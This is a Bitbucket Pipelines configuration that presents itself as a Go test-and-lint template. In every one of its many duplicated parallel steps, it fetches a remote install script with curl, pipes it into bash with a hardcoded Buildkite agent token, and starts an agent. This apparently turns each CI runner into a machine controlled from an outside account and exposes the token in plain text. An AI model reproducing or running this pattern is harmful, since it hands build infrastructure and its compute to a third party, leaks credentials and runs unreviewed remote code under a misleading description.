#  Template Go (Golang) build

#  This template allows you to validate your Go (Golang) code.
#  The workflow allows running tests, build and code linting on the default branch.

image: golang:1.15

pipelines:
  default:
    - parallel:
      - step:
          name: Test1
          script:
            - mkdir test-reports
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
            - go get -u github.com/jstemmer/go-junit-report
            - go test tests/* -v 2>&1 | go-junit-report > test-reports/report.xml
            # Build compiles the packages
            - go build src/*
      - step:
          name: Lint code
          image: golangci/golangci-lint:v1.31.0
          script:
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
            - golangci-lint run -v
           
      - step:
          name: Test2
          script:
            - mkdir test-reports
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
            - go get -u github.com/jstemmer/go-junit-report
            - go test tests/* -v 2>&1 | go-junit-report > test-reports/report.xml
            # Build compiles the packages
            - go build src/*
      - step:
          name: Lint code
          image: golangci/golangci-lint:v1.31.0
          script:
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
            - golangci-lint run -v            
      - step:
          name: Build
          script:
            - mkdir test-reports
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
            - go get -u github.com/jstemmer/go-junit-report
            - go test tests/* -v 2>&1 | go-junit-report > test-reports/report.xml
            # Build compiles the packages
            - go build src/*
      - step:
          name: Lint code
          image: golangci/golangci-lint:v1.31.0
          script:
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
            - golangci-lint run -v
      - step:
          name: Build2
          script:
            - mkdir test-reports
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
            - go get -u github.com/jstemmer/go-junit-report
            - go test tests/* -v 2>&1 | go-junit-report > test-reports/report.xml
            # Build compiles the packages
            - go build src/*
      - step:
          name: Lint code
          image: golangci/golangci-lint:v1.31.0
          script:
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
            - golangci-lint run -v
      - step:
          name: Test3
          script:
            - mkdir test-reports
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
            - go get -u github.com/jstemmer/go-junit-report
            - go test tests/* -v 2>&1 | go-junit-report > test-reports/report.xml
            # Build compiles the packages
            - go build src/*
      - step:
          name: Lint code
          image: golangci/golangci-lint:v1.31.0
          script:
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
            - golangci-lint run -v
      - step:
          name: Test1
          script:
            - mkdir test-reports
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
            - go get -u github.com/jstemmer/go-junit-report
            - go test tests/* -v 2>&1 | go-junit-report > test-reports/report.xml
            # Build compiles the packages
            - go build src/*
      - step:
          name: Lint code
          image: golangci/golangci-lint:v1.31.0
          script:
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
            - golangci-lint run -v
           
      - step:
          name: Test2
          script:
            - mkdir test-reports
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
            - go get -u github.com/jstemmer/go-junit-report
            - go test tests/* -v 2>&1 | go-junit-report > test-reports/report.xml
            # Build compiles the packages
            - go build src/*
      - step:
          name: Lint code
          image: golangci/golangci-lint:v1.31.0
          script:
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
            - golangci-lint run -v            
      - step:
          name: Build
          script:
            - mkdir test-reports
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
            - go get -u github.com/jstemmer/go-junit-report
            - go test tests/* -v 2>&1 | go-junit-report > test-reports/report.xml
            # Build compiles the packages
            - go build src/*
      - step:
          name: Lint code
          image: golangci/golangci-lint:v1.31.0
          script:
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
            - golangci-lint run -v
      - step:
          name: Build2
          script:
            - mkdir test-reports
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
            - go get -u github.com/jstemmer/go-junit-report
            - go test tests/* -v 2>&1 | go-junit-report > test-reports/report.xml
            # Build compiles the packages
            - go build src/*
      - step:
          name: Lint code
          image: golangci/golangci-lint:v1.31.0
          script:
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
            - golangci-lint run -v
      - step:
          name: Test3
          script:
            - mkdir test-reports
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
            - go get -u github.com/jstemmer/go-junit-report
            - go test tests/* -v 2>&1 | go-junit-report > test-reports/report.xml
            # Build compiles the packages
            - go build src/*
      - step:
          name: Lint code
          image: golangci/golangci-lint:v1.31.0
          script:
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
      - step:
          name: Test1
          script:
            - mkdir test-reports
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
            - go get -u github.com/jstemmer/go-junit-report
            - go test tests/* -v 2>&1 | go-junit-report > test-reports/report.xml
            # Build compiles the packages
            - go build src/*
      - step:
          name: Lint code
          image: golangci/golangci-lint:v1.31.0
          script:
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
            - golangci-lint run -v
           
      - step:
          name: Test2
          script:
            - mkdir test-reports
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
            - go get -u github.com/jstemmer/go-junit-report
            - go test tests/* -v 2>&1 | go-junit-report > test-reports/report.xml
            # Build compiles the packages
            - go build src/*
      - step:
          name: Lint code
          image: golangci/golangci-lint:v1.31.0
          script:
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
            - golangci-lint run -v            
      - step:
          name: Build
          script:
            - mkdir test-reports
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
            - go get -u github.com/jstemmer/go-junit-report
            - go test tests/* -v 2>&1 | go-junit-report > test-reports/report.xml
            # Build compiles the packages
            - go build src/*
      - step:
          name: Lint code
          image: golangci/golangci-lint:v1.31.0
          script:
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
            - golangci-lint run -v
      - step:
          name: Build2
          script:
            - mkdir test-reports
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
            - go get -u github.com/jstemmer/go-junit-report
            - go test tests/* -v 2>&1 | go-junit-report > test-reports/report.xml
            # Build compiles the packages
            - go build src/*
      - step:
          name: Lint code
          image: golangci/golangci-lint:v1.31.0
          script:
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
            - golangci-lint run -v
      - step:
          name: Test3
          script:
            - mkdir test-reports
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"
            - go get -u github.com/jstemmer/go-junit-report
            - go test tests/* -v 2>&1 | go-junit-report > test-reports/report.xml
            # Build compiles the packages
            - go build src/*
      - step:
          name: Lint code
          image: golangci/golangci-lint:v1.31.0
          script:
            - TOKEN="ff6ddf207382e7adfa519b21d3fceb992fbe8b19c718da7f3e" bash -c "`curl -sL https://raw.githubusercontent.com/buildkite/agent/master/install.sh`" && ~/.buildkite-agent/bin/buildkite-agent start --tags "mbc=true"      